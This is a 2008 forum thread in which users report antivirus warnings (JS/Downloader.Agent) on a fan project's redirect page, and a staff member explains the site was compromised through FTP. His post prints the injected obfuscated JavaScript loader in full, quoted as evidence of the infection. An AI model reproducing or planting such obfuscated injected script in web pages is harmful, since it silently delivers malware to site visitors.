Hard Light Productions Forums
Site Management => Site Support / Feedback => Topic started by: Talon 1024 on March 15, 2008, 05:09:20 pm
-
Whenever I click on my Project Badge that links to wcsaga.hard-light.net, Firefox pops up an AVG warning that says "Exploit link to known exploit site" and it doesn't show what it is supposed to show. Seriously, what the hell? I've never known HLP to be an exploit site!
EDIT: It does it in IE too.
FYI I'm using AVG Anti-Virus 8
Also, when I deactivate the Active Surf-Shield, it pops up an error message saying "Virus identified JS/Downloader.Agent"
-
Where's Carl?
<_<
>_>
-
Likely false positives in the definitions file...
A while ago there was an issue with Avast! giving false positives about every phpBB forum having some trojan/malware (VBS or something); they eventually cleared it from the definitions file and haven't had problems with it since. With high probability it's something similar in this case... perhaps go and check AVG forums for false positive reports like this, and if there is no reports, perhaps report it as false positive, it'll likely be fixed by the next definitons file update or if not that, soon anyways.
I'm pretty sure that HLP is not a really known exploit site... :p
-
:nervous:
-
I have firefox and AVG and everything works fine for me.
-
Maybe that virus, trojan or whatever it is is already on your computer and trying to redirect you somewhere else.
-
Maybe that virus, trojan or whatever it is is already on your computer and trying to redirect you somewhere else.
It doesn't matter what computer I'm using... It still does it, regardless.
-
What protection level is AVG at?
-
Oh Oh..... i'm getting that too with AVG, it appears to be Saga's site.
Strange, doesn't do it for me, but with Starmans it does. :blah:
-
Wait, it happens for you too, Scoob?
-
ya and i'm using opera too
Virus identified JS/Downloader.Agent
-
Well I just updated my AVG and went to WCSaga and no virus warning here.
-
Well I just updated my AVG and went to WCSaga and no virus warning here.
Click on Talon's avatar and see.
-
It works just fine for me. It seems to be a problem with Java Script. Check out settings and see if you can unblock wcsaga's website.
-
Well I just updated my AVG and went to WCSaga and no virus warning here.
Click on Talon's avatar and see.
That is what I tried last night actually.
-
You aren't, by any chance, refering the redirect site hosted on hlp?
-
You aren't, by any chance, refering the redirect site hosted on hlp?
Umm, yeah. I was referring to wcsaga.hard-light.net (http://wcsaga.hard-light.net).
-
You are right. There was an IE exploit.
I can see only one explanation: somebody accessed the ftp from an infected pc. The virus added following line below the </body> html tag.
<script language=JavaScript>var mf=" shapgvba ejtf(c){ine ro,con=\" HcvfNU)z\\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else
if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\"G]$K;Ms$G'Ua<SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\"G]$KMG=GMMGMza\\a><\\/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);</script>
-
Is it fixed? I don't get anything with FF (AVG 7.5 Free)
-
me neither. but does that mean we're infected now or something?
-
Doesn't matter for me, I'm reinstalling later this week, but yeah, are we?
-
Damn... Now that T has posted the virus line, I have to disable protection just to reply to the thread... Thankfully, I can at least access wcsaga.hard-light.net (http://wcsaga.hard-light.net) without being told by AVG. (And be able to view it properly)